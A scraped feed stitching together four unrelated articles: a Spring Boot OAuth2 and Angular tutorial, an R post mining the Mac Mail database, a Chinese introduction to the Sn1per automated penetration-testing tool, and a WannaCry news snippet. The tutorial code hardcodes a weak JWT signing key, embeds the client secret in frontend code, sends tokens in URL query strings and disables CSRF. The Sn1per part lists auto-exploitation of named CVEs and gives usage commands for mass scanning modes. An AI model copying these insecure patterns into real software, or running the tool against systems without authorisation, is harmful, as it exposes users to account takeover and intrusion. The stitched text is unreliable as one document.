This class extends AuthorizationServerConfigurerAdapter and is responsible for generating tokens specific to a client.Suppose, if a user wants to login to devglan.com via facebook then facebook auth server will be generating tokens for Devglan.In this case, Devglan becomes the client which will be requesting for authorization code on behalf of user from facebook - the authorization server.

Here, JwtAccessTokenConverter is the helper that translates between JWT encoded token values and OAuth authentication information. We have added our custom signature to make the JWT token more robust.Apart from JwtTokenStore, spring security also provides InMemoryTokenStore and JdbcTokenStore.

Here, we are using in-memory credentials with client_id as devglan-client and CLIENT_SECRET as devglan-secret(bcrypted here in Spring Boot 2).But you are free to use JDBC implementation too.

@EnableAuthorizationServer: Enables an authorization server.AuthorizationServerEndpointsConfigurer defines the authorization and token endpoints and the token services.

You can use this tool to generate Bcrypt password with plain-text online .

AuthorizationServerConfig.java @Configuration @EnableAuthorizationServer public class AuthorizationServerConfig extends AuthorizationServerConfigurerAdapter { static final String CLIEN_ID = "devglan-client"; //static final String CLIENT_SECRET = "devglan-secret"; static final String CLIENT_SECRET = "$2a$04$e/c1/RfsWuThaWFCrcCuJeoyvwCV0URN/6Pn9ZFlrtIWaU/vj/BfG"; static final String GRANT_TYPE_PASSWORD = "password"; static final String AUTHORIZATION_CODE = "authorization_code"; static final String REFRESH_TOKEN = "refresh_token"; static final String IMPLICIT = "implicit"; static final String SCOPE_READ = "read"; static final String SCOPE_WRITE = "write"; static final String TRUST = "trust"; static final int ACCESS_TOKEN_VALIDITY_SECONDS = 1*60*60; static final int FREFRESH_TOKEN_VALIDITY_SECONDS = 6*60*60; @Autowired private AuthenticationManager authenticationManager; @Bean public JwtAccessTokenConverter accessTokenConverter() { JwtAccessTokenConverter converter = new JwtAccessTokenConverter(); converter.setSigningKey("as466gf"); return converter; } @Bean public TokenStore tokenStore() { return new JwtTokenStore(accessTokenConverter()); } @Override public void configure(ClientDetailsServiceConfigurer configurer) throws Exception { configurer .inMemory() .withClient(CLIEN_ID) .secret(CLIENT_SECRET) .authorizedGrantTypes(GRANT_TYPE_PASSWORD, AUTHORIZATION_CODE, REFRESH_TOKEN, IMPLICIT ) .scopes(SCOPE_READ, SCOPE_WRITE, TRUST) .accessTokenValiditySeconds(ACCESS_TOKEN_VALIDITY_SECONDS). refreshTokenValiditySeconds(FREFRESH_TOKEN_VALIDITY_SECONDS); } @Override public void configure(AuthorizationServerEndpointsConfigurer endpoints) { endpoints.tokenStore(tokenStore()) .authenticationManager(authenticationManager) .accessTokenConverter(accessTokenConverter()); } } Resource Server Config

Resource in our context is the REST API which we have exposed for the crud operation. To access these resources, the client must be authenticated. In real-time scenarios, whenever a user tries to access these resources, the user will be asked to provide his authenticity and once the user is authorized then he will be allowed to access these protected resources.

resourceId : the id for the resource (optional, but recommended and will be validated by the auth server if present).

ResourceServerConfig.java package com.devglan.config; import org.springframework.context.annotation.Configuration; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer; import org.springframework.security.oauth2.config.annotation.web.configuration.ResourceServerConfigurerAdapter; import org.springframework.security.oauth2.config.annotation.web.configurers.ResourceServerSecurityConfigurer; import org.springframework.security.oauth2.provider.error.OAuth2AccessDeniedHandler; @Configuration @EnableResourceServer public class ResourceServerConfig extends ResourceServerConfigurerAdapter { private static final String RESOURCE_ID = "resource_id"; @Override public void configure(ResourceServerSecurityConfigurer resources) { resources.resourceId(RESOURCE_ID).stateless(false); } @Override public void configure(HttpSecurity http) throws Exception { http. anonymous().disable() .authorizeRequests() .antMatchers("/users/**").access("hasRole('ADMIN')") .and().exceptionHandling().accessDeniedHandler(new OAuth2AccessDeniedHandler()); } } OAUTH2 Security Config

This class extends WebSecurityConfigurerAdapter and provides usual spring security configuration.Here, we are using bcrypt encoder to encode our passwords. You can try this online Bcrypt Tool to encode and match bcrypt passwords.Following configuration basically bootstraps the authorization server and resource server.

@EnableWebSecurity : Enables spring security web security support.

@EnableGlobalMethodSecurity : Support to have method level access control such as @PreAuthorize @PostAuthorize

SecurityConfig.java package com.devglan.config; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.web.servlet.FilterRegistrationBean; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.security.authentication.AuthenticationManager; import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder; import org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter; import org.springframework.security.core.userdetails.UserDetailsService; import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder; import org.springframework.security.oauth2.provider.ClientDetailsService; import org.springframework.security.oauth2.provider.approval.ApprovalStore; import org.springframework.security.oauth2.provider.approval.TokenApprovalStore; import org.springframework.security.oauth2.provider.approval.TokenStoreUserApprovalHandler; import org.springframework.security.oauth2.provider.request.DefaultOAuth2RequestFactory; import org.springframework.security.oauth2.provider.token.TokenStore; import org.springframework.security.oauth2.provider.token.store.InMemoryTokenStore; import org.springframework.security.oauth2.provider.token.store.JwtAccessTokenConverter; import org.springframework.security.oauth2.provider.token.store.JwtTokenStore; import org.springframework.web.cors.CorsConfiguration; import org.springframework.web.cors.UrlBasedCorsConfigurationSource; import org.springframework.web.filter.CorsFilter; import javax.annotation.Resource; @Configuration @EnableWebSecurity @EnableGlobalMethodSecurity(prePostEnabled = true) public class SecurityConfig extends WebSecurityConfigurerAdapter { @Resource(name = "userService") private UserDetailsService userDetailsService; @Override @Bean public AuthenticationManager authenticationManagerBean() throws Exception { return super.authenticationManagerBean(); } @Autowired public void globalUserDetails(AuthenticationManagerBuilder auth) throws Exception { auth.userDetailsService(userDetailsService) .passwordEncoder(encoder()); } @Override protected void configure(HttpSecurity http) throws Exception { http .csrf().disable() .anonymous().disable() .authorizeRequests() .antMatchers("/api-docs/**").permitAll(); } @Bean public BCryptPasswordEncoder encoder(){ return new BCryptPasswordEncoder(); } } REST APIs Implementation

Now let us define our controller class.

UserController.java @RestController @RequestMapping("/users") public class UserController { @Autowired private UserService userService; @RequestMapping(value="/user", method = RequestMethod.GET) public List listUser(){ return userService.findAll(); } @RequestMapping(value = "/user", method = RequestMethod.POST) public User create(@RequestBody User user){ return userService.save(user); } @RequestMapping(value = "/user/{id}", method = RequestMethod.GET) public User findOne(@PathVariable long id){ return userService.findOne(id); } @RequestMapping(value = "/user/{id}", method = RequestMethod.PUT) public User update( @PathVariable long id, @RequestBody User user){ user.setId(id); return userService.save(user); } @RequestMapping(value = "/user/{id}", method = RequestMethod.DELETE) public void delete( @PathVariable(value = "id") Long id){ userService.delete(id); } } User.Java @Entity public class User { @Id @GeneratedValue(strategy= GenerationType.IDENTITY) private long id; @Column private String firstName; @Column private String lastName; @Column private String username; @Column @JsonIgnore private String password; @Column private long salary; @Column private int age; //setters and getters application.properties spring.datasource.url=jdbc:mysql://localhost:3306/test spring.datasource.username=root spring.datasource.password=root spring.jpa.show-sql=true spring.user.datasource.driver-class-name=com.mysql.jdbc.Driver

Below is the default script that can be used for first use.

script.sql create table user (id bigint not null auto_increment, age integer, first_name varchar(255), last_name varchar(255), password varchar(255), salary bigint, username varchar(255), primary key (id)) engine=MyISAM; INSERT INTO user (age, first_name, last_name,password,salary,username) values (23, 'admin', 'admin','$2a$04$EZzbSqieYfe/nFWfBWt2KeCdyq0UuDEM1ycFF8HzmlVR6sbsOnw7u',12345,'admin'); Angular OAUTH2 Implementation

First we will be generating an Angular 7 app using angular cli and then create different components for create, edit, add and delete user. The step by step demonstration of creating Angular 7 app can be found in my previous article here -Angular 7 CRUD App.Below is the project structure for the same.


Spring Boot Security Oauth2 With Angular

Below is the list of command that we have used to generate above project structure.

npm i npm@latest -g ng new my-dream-app cd my-dream-app ng serve ng g component login ng g component add-user ng g component edit-user ng g component list-user OAUTH2 Login In Angular

We have reactive forms defined. Once, the form is submitted, the endpoint at oauth/token will be hit to get the token. Below is the API details:

API Name - Login Method - POST URL - oauth/login Header - 'Authorization': 'Basic ' + btoa('devglan-client:devglan-secret') Body - {'username' :'admin ', 'password' :'admin', 'grant_type': 'password' } Content-type: application/x-www-form-urlencoded login.component.html &ltdiv class="row"> &ltdiv class="col-md-6 login-container"> &lth2 style="margin: auto"&gtLogin </h2> &ltform [formGroup]="loginForm" (ngSubmit)="onSubmit()"> &ltdiv class="form-group"> &ltlabel for="username"&gtUserName:</label> &ltinput type="text" class="form-control" formControlName="username" id="username" autocomplete="off"> &ltdiv class="error" *ngIf="loginForm.controls['username'].hasError('required') && loginForm.controls['username'].touched"&gtUsername is required</div> </div> &ltdiv class="form-group"> &ltlabel for="pwd"&gtPassword:</label> &ltinput type="password" class="form-control" formControlName="password" id="pwd" autocomplete="off"> &ltdiv class="error" *ngIf="loginForm.controls['password'].hasError('required') && loginForm.controls['password'].touched"&gtPassword is required</div> </div> &ltbutton class="btn btn-success" [disabled]="loginForm.invalid"&gtLogin</button> &ltdiv *ngIf="invalidLogin" class="error"> &ltdiv&gtInvalid credentials.</div> </div> </form> </div> </div>
Spring Boot Security Oauth2 With Angular
login.component.ts export class LoginComponent implements OnInit { loginForm: FormGroup; invalidLogin: boolean = false; constructor(private formBuilder: FormBuilder, private router: Router, private apiService: ApiService) { } onSubmit() { if (this.loginForm.invalid) { return; } const body = new HttpParams() .set('username', this.loginForm.controls.username.value) .set('password', this.loginForm.controls.password.value) .set('grant_type', 'password'); this.apiService.login(body.toString()).subscribe(data => { window.sessionStorage.setItem('token', JSON.stringify(data)); console.log(window.sessionStorage.getItem('token')); this.router.navigate(['list-user']); }, error => { alert(error.error.error_description) }); } ngOnInit() { window.sessionStorage.removeItem('token'); this.loginForm = this.formBuilder.group({ username: ['', Validators.compose([Validators.required])], password: ['', Validators.required] }); } } login image api.service.ts

Check the login API here. This is exactly as per the API definition we defined above.

@Injectable() export class ApiService { constructor(private http: HttpClient) { } baseUrl: string = 'http://localhost:8080/users/'; login(loginPayload) { const headers = { 'Authorization': 'Basic ' + btoa('devglan-client:devglan-secret'), 'Content-type': 'application/x-www-form-urlencoded' } return this.http.post('http://localhost:8080/' + 'oauth/token', loginPayload, {headers}); } getUsers() { return this.http.get(this.baseUrl + 'user?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token); } getUserById(id: number) { return this.http.get(this.baseUrl + 'user/' + id + '?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token); } createUser(user: User){ return this.http.post <apiresponse> (this.baseUrl + 'user?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token, user); } updateUser(user: User): Observable <apiresponse> { return this.http.put <apiresponse> (this.baseUrl + 'user/' + user.id + '?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token, user); } deleteUser(id: number){ return this.http.delete <apiresponse> (this.baseUrl + 'user/' + id + '?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token); } } </apiresponse> </apiresponse> </apiresponse> </apiresponse>

We have the similar implementation to add and edit user. The implementation is very basic and do let me for any clarification required in the comment section below:

After a successful login, list-user route will be loaded and getUsers() will be invoked that will load the list of users from the API and the user list will be shown in a tabular form. Each row will have a button to either update or delete any user entry. Add button will open a new form to add a new user. On click of the edit button, the selected user id will be cached in session storage and edit component will be loaded with user details auto populated from the DB. A click on delete button will instantly delete the user from DB and update the table.

add-user.component.html &ltdiv class="col-md-6 user-container"> &lth2 class="text-center"&gtAdd User</h2> &ltform [formGroup]="addForm" (ngSubmit)="onSubmit()"> &ltdiv class="form-group"> &ltlabel for="username"&gtUser Name:</label> &ltinput type="text" formControlName="username" placeholder="username" name="username" class="form-control" id="username"> </div> &ltdiv class="form-group"> &ltlabel for="password"&gtPassword:</label> &ltinput type="password" formControlName="password" placeholder="password" name="password" class="form-control" id="password"> </div> &ltdiv class="form-group"> &ltlabel for="firstName"&gtFirst Name:</label> &ltinput formControlName="firstName" placeholder="First Name" name="firstName" class="form-control" id="firstName"> </div> &ltdiv class="form-group"> &ltlabel for="lastName"&gtLast Name:</label> &ltinput formControlName="lastName" placeholder="Last name" name="lastName" class="form-control" id="lastName"> </div> &ltdiv class="form-group"> &ltlabel for="age"&gtAge:</label> &ltinput type="number" formControlName="age" placeholder="age" name="age" class="form-control" id="age"> </div> &ltdiv class="form-group"> &ltlabel for="salary"&gtSalary:</label> &ltinput type="number" formControlName="salary" placeholder="salary" name="salary" class="form-control" id="salary"> </div> &ltbutton class="btn btn-success"&gtUpdate</button> </form> </div> add-user.component.ts @Component({ selector: 'app-add-user', templateUrl: './add-user.component.html', styleUrls: ['./add-user.component.css'] }) export class AddUserComponent implements OnInit { constructor(private formBuilder: FormBuilder,private router: Router, private apiService: ApiService) { } addForm: FormGroup; ngOnInit() { this.addForm = this.formBuilder.group({ id: [], username: ['', Validators.required], password: ['', Validators.required], firstName: ['', Validators.required], lastName: ['', Validators.required], age: ['', Validators.required], salary: ['', Validators.required] }); } onSubmit() { this.apiService.createUser(this.addForm.value) .subscribe( data => { this.router.navigate(['list-user']); }); } } edit-user.component.html &ltdiv class="col-md-6 user-container"> &lth2 class="text-center"&gtEdit User</h2> &ltform [formGroup]="editForm" (ngSubmit)="onSubmit()"> &ltdiv class="hidden"> &ltinput type="text" formControlName="id" placeholder="id" name="id" class="form-control" id="id"> </div> &ltdiv class="form-group"> &ltlabel for="username"&gtUser Name:</label> &ltinput type="text" formControlName="username" placeholder="username" name="username" class="form-control" id="username" readonly="true"> </div> &ltdiv class="form-group"> &ltlabel for="firstName"&gtFirst Name:</label> &ltinput formControlName="firstName" placeholder="First Name" name="firstName" class="form-control" id="firstName"> </div> &ltdiv class="form-group"> &ltlabel for="lastName"&gtLast Name:</label> &ltinput formControlName="lastName" placeholder="Last name" name="lastName" class="form-control" id="lastName"> </div> &ltdiv class="form-group"> &ltlabel for="age"&gtAge:</label> &ltinput type="number" formControlName="age" placeholder="age" name="age" class="form-control" id="age"> </div> &ltdiv class="form-group"> &ltlabel for="salary"&gtSalary:</label> &ltinput type="number" formControlName="salary" placeholder="salary" name="salary" class="form-control" id="salary"> </div> &ltbutton class="btn btn-success"&gtUpdate</button> </form> </div>
Spring Boot Security Oauth2 With Angular
edit-user.component.ts export class EditUserComponent implements OnInit { user: User; editForm: FormGroup; constructor(private formBuilder: FormBuilder,private router: Router, private apiService: ApiService) { } ngOnInit() { let userId = window.sessionStorage.getItem("editUserId"); if(!userId) { alert("Invalid action.") this.router.navigate(['list-user']); return; } this.editForm = this.formBuilder.group({ id: [''], username: ['', Validators.required], firstName: ['', Validators.required], lastName: ['', Validators.required], age: ['', Validators.required], salary: ['', Validators.required] }); this.apiService.getUserById(+userId) .subscribe( data => { this.editForm.setValue(data); }); } onSubmit() { this.apiService.updateUser(this.editForm.value) .pipe(first()) .subscribe( data => { alert('User updated successfully.'); this.router.navigate(['list-user']); }, error => { alert(error); }); } }

Following is our angular module and routing configuration.

app.module.ts import { BrowserModule } from '@angular/platform-browser'; import { NgModule } from '@angular/core'; import { AppComponent } from './app.component'; import { LoginComponent } from './login/login.component'; import { AddUserComponent } from './add-user/add-user.component'; import { EditUserComponent } from './edit-user/edit-user.component'; import { ListUserComponent } from './list-user/list-user.component'; import {ApiService} from "./core/api.service"; import {HttpClientModule} from "@angular/common/http"; import {ReactiveFormsModule} from "@angular/forms"; import {routing} from "./app.routing"; @NgModule({ declarations: [ AppComponent, LoginComponent, AddUserComponent, EditUserComponent, ListUserComponent ], imports: [ BrowserModule, routing, ReactiveFormsModule, HttpClientModule ], providers: [ApiService], bootstrap: [AppComponent] }) export class AppModule { } app.routing.ts import { RouterModule, Routes } from '@angular/router'; import {LoginComponent} from "./login/login.component"; import {AddUserComponent} from "./add-user/add-user.component"; import {ListUserComponent} from "./list-user/list-user.component"; import {EditUserComponent} from "./edit-user/edit-user.component"; const routes: Routes = [ { path: 'login', component: LoginComponent }, { path: 'add-user', component: AddUserComponent }, { path: 'list-user', component: ListUserComponent }, { path: 'edit-user', component: EditUserComponent }, {path : '', component : LoginComponent} ]; export const routing = RouterModule.forRoot(routes); Conclusion

In this article, we discussed about implementing Spring Boot OAUTH2 with Angular application. We configured our authorization server and resource server using OAUTH2 and secured our REST APIs. The same REST APIs was accesses with angular client after generating JWT OAUTH token.

Download the source

Should Old Acquaintance be Forgot: Tidying up Mac Mail

$
0
0

(This article was first published on An Accounting and Data Science Nerd's Corner , and kindly contributed toR-bloggers)

As the year is closing down, why not spend some of the free time to explore your email data using R and the tidyverse? When I learned that Mac OS Mail stores its internal data in a SQLite database file I was hooked. A quick dive in your email archive might uncover some of your old acquaintances. Let’s take a peak.

Obviously, the below is only applicable when you are a regular user of the Mail app for Mac OS. As a first step, you need to locate the file Envelope Index that tends to be located in ~/Library/Mail/V6/MailData/ . Copy this file somewhere and adjust the path provided in mail_db to point to this copy. Do not work with the original file.

library(DBI) library(tidyverse) library(lubridate) library(ExPanDaR) library(ggridges) mail_db <- "data/EI" con <- dbConnect(RSQLite::SQLite(), mail_db)

Now you have established a database connection to your copy of Mac OS Mail’s internal data. I you receive an error message, check whether you have the required packages (including RSQLite ) installed. With this established connection, we can now see what the database has in store for us.

kable(dbListTables(con), col.names = "List of Tables") List of Tables action_ews_messages action_imap_messages action_labels action_messages addresses attachments duplicates_unread_count events ews_copy_action_messages ews_folders imap_copy_action_messages imap_labels imap_messages labels last_spotlight_check_date local_message_actions mailbox_actions mailboxes messages properties recipients sqlite_sequence subjects threads

Hey, this is an impressive list of tables. For this bog post, I am mostly interested in exploring the development of my email activity in terms of senders and receivers over time. Thus, I focus on the relations messages , addresses and recipients .

messages <- dbListFields(con, "messages") recipients <- dbListFields(con, "recipients") addresses <- dbListFields(con, "addresses") max_members <- max(length(messages), length(recipients), length(addresses)) length(messages) <- max_members length(recipients) <- max_members length(addresses) <- max_members df <- data.frame(messages, recipients, addresses, stringsAsFactors = FALSE) df[is.na(df)] <- "" kable(df) messages recipients addresses ROWID ROWID ROWID message_id message_id address document_id type comment in_reply_to address_id remote_id position sender subject_prefix subject date_sent date_received date_created date_last_viewed mailbox remote_mailbox flags read flagged size color type conversation_id snippet fuzzy_ancestor automated_conversation root_status conversation_position deleted

OK. These relations provide enough data to play. Let’s create a table that is organized by message and contains sender and receiver info as well as sending/receiving time.

sql <- paste("SELECT messages.ROWID as message_id, date_sent,", "date_received, a1.address as sender_address,", "a1.comment as sender_comment, a2.address as recipient_address,", "a2.comment as recipient_comment, snippet", "FROM messages left join addresses AS a1 on messages.sender = a1.ROWID", "LEFT JOIN recipients on recipients.message_id = messages.ROWID", "LEFT JOIN addresses AS a2 on recipients.address_id = a2.ROWID") res <- dbSendQuery(con, sql) df <- dbFetch(res) dbClearResult(res) dbDisconnect(con) df[,c("date_sent", "date_received")] <- lapply(df[,c("date_sent", "date_received")], function(x) as.POSIXct(x, origin = "1970-01-01"))

The resulting data frame contains all messages, including messages sent to multiple recipients (with me on the sending or receiving end). To limit the messages to the ones where I am involved, I match sender_address and receiver_address to a vector my_adresses containing my email addresses (not disclosed here for privacy reasons).

df %>% filter(tolower(sender_address) %in% my_addresses | tolower(recipient_address) %in% my_addresses) %>% distinct(.keep_all = TRUE) %>% arrange(date_received) -> emails

In addition, I prepare a panel dataset that contains data at email address year level.

emails %>% filter(!tolower(sender_address) %in% my_addresses) %>% mutate(address = tolower(sender_address), year = year(date_received)) %>% group_by(year, address) %>% summarise(emails_received_from = n()) -> emails_received emails %>% filter(!tolower(recipient_address) %in% my_addresses) %>% mutate(address = tolower(recipient_address), year = year(date_received)) %>% group_by(year, address) %>% summarise(emails_sent_to = n()) -> emails_sent panel <- full_join(emails_received, emails_sent) %>% replace_na(list(emails_sent_to = 0, emails_received_from = 0)) %>% arrange(year, -emails_sent_to, -emails_received_from)

Time for a first analysis. How does my email in- and outflow develop over the years?

panel %>% group_by(year) %>% summarise(sent_mails = sum(emails_sent_to), received_mails = sum(emails_received_from)) %>% gather(key = "var", value = "count", -year) %>% ggplot(aes(year, count)) + geom_bar(aes(fill = var), position = "dodge", stat="identity") + scale_fill_discrete(name="Direction", labels=c("Emails received", "Emails sent")) + xlab("Year") + ylab("Number of emails") + theme_minimal() + theme(legend.position=c(.3, .8))
Should Old Acquaintance be Forgot: Tidying up Mac Mail

Hmm. I have no interest in extrapolating this time trend… Just for fun and giggles: When do I send emails (by time of day)?

emails %>% filter(sender_address %in% my_addresses) %>% mutate(sent_tod = hour(date_sent)) %>% ggplot() + geom_histogram(aes(sent_tod), binwidth=1, fill = "#00376C") + xlab("Time of day [24 hours]") + ylab("Number of emails") + theme_minimal()
Should Old Acquaintance be Forgot: Tidying up Mac Mail

No real surprises here (at least for me), besides that I seem to take a dip in the early afternoon. Does this sending behavior exhibit any interesting time trends?

emails %>% filter(sender_address %in% my_addresses) %>% mutate(sent_tod = hour(date_sent) + minute(date_sent)/60 + second(date_sent)/3600, year = as.factor(year(date_sent))) %>% ggplot(aes(x = sent_tod, y = year, fill = ..x..)) + geom_density_ridges_gradient(scale =2, rel_min_height = 0.01) + ylab("Year") + xlab("Time of day [24 hours]") + theme_minimal() + theme(legend.position = "none")
Should Old Acquaintance be Forgot: Tidying up Mac Mail

2002 and 2003 stand out (I was based in the U.S. for most of this period) and it seems as if I am gradually becoming more of an early starter.

But enough on this. This is supposed to be about old acquaintances to fit this special end-of-the-year mood. Let’s dive more into the personal sphere. For this, I define an “email contact” as an email address with an email exchange in a given year, meaning that I was both, at the receiving and sending end, at least once.

panel %>% group_by(year) %>% filter(emails_sent_to > 0, emails_received_from > 0) %>% summarise(nr_email_contacts = n()) %>% ggplot(aes(year, nr_email_contacts)) + geom_bar(stat="identity", fill = "#00376C") + xlab("Year") + ylab("Head count email contacts") + theme_minimal()
Should Old Acquaintance be Forgot: Tidying up Mac Mail

I would never have never guessed that I am exchanging emails with that many people (No, I am not a spammer …, I hope). Who are my “top contacts”?

panel %>% filter(emails_sent_to > 0, emails_received_from > 0) %>% group_by(address) %>% summarise(email_contacts = sum(emails_sent_to) + sum(emails_received_from), sent_rec_ratio = sum(emails_sent_to) / sum(emails_received_from), emails_sent_to = sum(emails_sent_to), emails_received_from = sum(emails_received_from)) %>% arrange(-email_contacts) -> email_contacts # head(email_contacts, 50)

I am not including this output here for obvious privacy reasons. If you are interested to follow your email contacts over time, you can use my ExPanD shiny app for quick exploration.

panel %>% filter(emails_sent_to > 0, emails_received_from > 0) %>% ExPanD(cs_id = "address", ts_id = "year", components = c(missing_values = FALSE, by_group_violin_graph = FALSE, by_group_bar_graph = FALSE))

Using ExPanD, I encountered a reasonable amount of my “old acquaintances” when focusing on earlier years of the panel. To do this a little bit more systematically, I prepare a linking table, linking the most prominent email contact addresses in the panel file to real people names in an n(email addresses) to 1(person) look-up table. This table has the name email_contacts_names and the fields address and name . Based on this data I produce a new panel sample containing only those email contacts linked to actual persons that I care about.

panel %>% left_join(email_contacts_names) %>% filter(!is.na(name)) %>% group_by(year, name) %>% summarise(emails_sent_to = sum(emails_sent_to), emails_received_from = sum(emails_received_from)) %>% filter(emails_sent_to > 0, emails_received_from > 0) %>% mutate(email_contacts = emails_sent_to + emails_received_from, sent_rec_ratio = emails_sent_to / emails_received_from) %>% arrange(year, -email_contacts) -> panel_email_contacts

Using this data, you can now easily explore how your contacts changed over time. As one example I prepared a graph highlighting the (relative) number of email contacts with a selected group of people over time. The vector people contains the names of these people.

single_out_people <- function(df, names, relative = FALSE) { df$relative <- relative palette <- function(n) { hues = seq(15, 375, length = n) c("#B0B0B0", hcl(h = hues, l = 65, c = 100)[1:n]) } df %>% mutate(name = ifelse(name %in% names, name, "Other")) %>% group_by(year) %>% mutate(val = ifelse(relative, email_contacts/sum(email_contacts), email_contacts)) %>% select(year, name, val) %>% group_by(year, name) %>% summarise(val = sum(val)) %>% spread(key = name, value = val, fill = 0) %>% gather(key = name, value = val, -year) %>% mutate(name = factor(name, levels = c("Other", rev(names)))) %>% arrange(year, name) %>% ggplot(aes(x = year, y = val, fill = name)) + geom_area() + scale_fill_manual(values = palette(length(names))) + xlab("Year") + ylab(ifelse(relative, "Share of annual email contacts", "Annual email contacts")) + theme_minimal() -> p if (relative) p + scale_y_continuous(labels = scales::percent) else p } single_out_people(panel_email_contacts, people, FALSE) + theme(legend.position="none")
Should Old Acquaintance be Forgot: Tidying up Mac Mail
single_out_people(panel_email_contacts, people, TRUE) + theme(legend.position="none")
Should Old Acquaintance be Forgot: Tidying up Mac Mail

The grayish areas marks “Other”. With legends excluded for privacy reasons, you can follow old and new friends through time with this little display.

While the Envelope Index database seems to offer much more data that is worth exploring, I will it leave it here. Happy New Year everybody and if you are in the mood: Auld Lang Syne .

Enjoy!


Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架

$
0
0
前言

今天给大家介绍的是一款专为安全专家设计的自动化渗透测试框架,这个自动化渗透测试框架名叫Sn1per。实际上,Sn1per社区版是一款自动化扫描工具,可在渗透测试过程中帮助研究人员完成漏洞的枚举和扫描任务。而Sn1per专业版作为Xero Security的额外报告插件,可给专业渗透测试人员、漏洞猎人和企业安全团队管理大型环境提供帮助。


Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架
Sn1per专业版功能 专业的报告接口
Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架
幻灯片形式查看报告截图
Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架
可搜索可排序的DNS、IP及开放端口数据库
Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架
主机分类报告
Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架
快速链接在线recon工具及Google Hacking查询
Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架
自定义单台主机的note文本
Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架
演示视频

视频地址: https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm

Sn1per社区版功能:

自动收集基础recon(例如whois、ping和DNS等等)

针对目标域名自动启动Google Hacking查询

通过Nmap端口扫描自动化枚举开放端口

自动化爆破子域名、收集DNS信息和检测区域转移

自动化检测子域名劫持

针对开放端口自动化运行Nmap脚本

自动化运行Metasploit扫描和漏洞利用模块

自动化扫描所有常见的Web应用漏洞

自动化爆破所有的开放服务

自动化测试匿名FTP访问

自动化运行WPScan、Arachni和Nikto

自动化枚举NFS共享

自动化测试匿名LDAP访问

自动化枚举SSL/TLS密码、协议和漏洞

自动化枚举SNMP社区字符串、服务和用户

自动化列举SMB用户及共享,检测空会话,利用MS08-067

自动化测试开放X11服务器

执行高级主机/子网枚举

自动化收集目标站点截图

创建独立工作站空间存储所有的扫描输出

自动化PWN

DrupalDrupalgedon2远程代码执行漏洞CVE-2018-7600

GPON路由器远程代码执行漏洞CVE-2018-10561

Apache Struts 2 远程代码执行漏洞CVE-2017-5638

ApacheStruts 2 远程代码执行漏洞CVE-2017-9805

ApacheJakarta 远程代码执行漏洞CVE-2017-5638

ShellshockGNU Bash远程代码执行漏洞CVE-2014-6271

HeartBleedOpenSSL检测漏洞CVE-2014-0160

MSwindows SMB远程代码执行漏洞MS08-067

Webmin文件披露漏洞CVE-2006-3392

匿名FTP 访问

phpMyAdmin后门远程代码执行漏洞

PHPMyAdmin认证绕过漏洞

JBossJava反序列化远程代码执行漏洞

Kali linux安装 ./install.sh Docker安装/构建

Docker安装:

https://github.com/menzow/sn1per-docker

Docker构建:

https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ 使用样例 $docker pull menzo/sn1per-docker $docker run --rm -ti menzo/sn1per-docker sniper menzo.io 工具使用 [*]NORMAL MODE sniper-t|--target <TARGET [*]NORMAL MODE + OSINT + RECON sniper-t|--target <TARGET -o|--osint -re|--recon [*]STEALTH MODE + OSINT + RECON sniper-t|--target <TARGET -m|--mode stealth -o|--osint -re|--recon [*]DISCOVER MODE sniper-t|--target <CIDR -m|--mode discover -w|--workspace<WORSPACE_ALIAS [*]SCAN ONLY SPECIFIC PORT sniper-t|--target <TARGET -m port -p|--port <portnum [*]FULLPORTONLY SCAN MODE sniper-t|--target <TARGET -fp|--fullportonly [*]PORT SCAN MODE sniper-t|--target <TARGET -m|--mode port -p|--port <PORT_NUM [*]WEB MODE - PORT 80 + 443 ONLY! sniper-t|--target <TARGET -m|--mode web [*]HTTP WEB PORT MODE sniper-t|--target <TARGET -m|--mode webporthttp -p|--port <port [*]HTTPS WEB PORT MODE sniper-t|--target <TARGET -m|--mode webporthttps -p|--port <port [*]ENABLE BRUTEFORCE sniper-t|--target <TARGET -b|--bruteforce [*]AIRSTRIKE MODE sniper-f|--file /full/path/to/targets.txt -m|--mode airstrike [*]NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINTENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED sniper-f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace<WORKSPACE_ALIAS [*]ENABLE LOOT IMPORTING INTO METASPLOIT sniper-t|--target <TARGET [*]LOOT REIMPORT FUNCTION sniper-w <WORKSPACE_ALIAS --reimport [*]UPDATE SNIPER sniper-u|--update

样本报告:【 传送门 】

项目地址

Sn1perv6.0:【 GitHub传送门 】

* 参考来源: kitploit ,FB小编Alpha_h4ck编译,转载请注明来自CodeSec.Net

当心!勒索病毒WannaCry仍然潜藏在世界各地的电脑上

$
0
0

当心!勒索病毒WannaCry仍然潜藏在世界各地的电脑上

新浪科技讯 12月27日下午消息,据台湾地区科技媒体iThome报道,安全公司Kryptos Logic中负责安全与威胁情报研究的Jamie Hankins上周在 Twitter 上表示,造成全球重大经济损失的勒索病毒WannaCry,至今仍然潜藏在世界各地的电脑上。

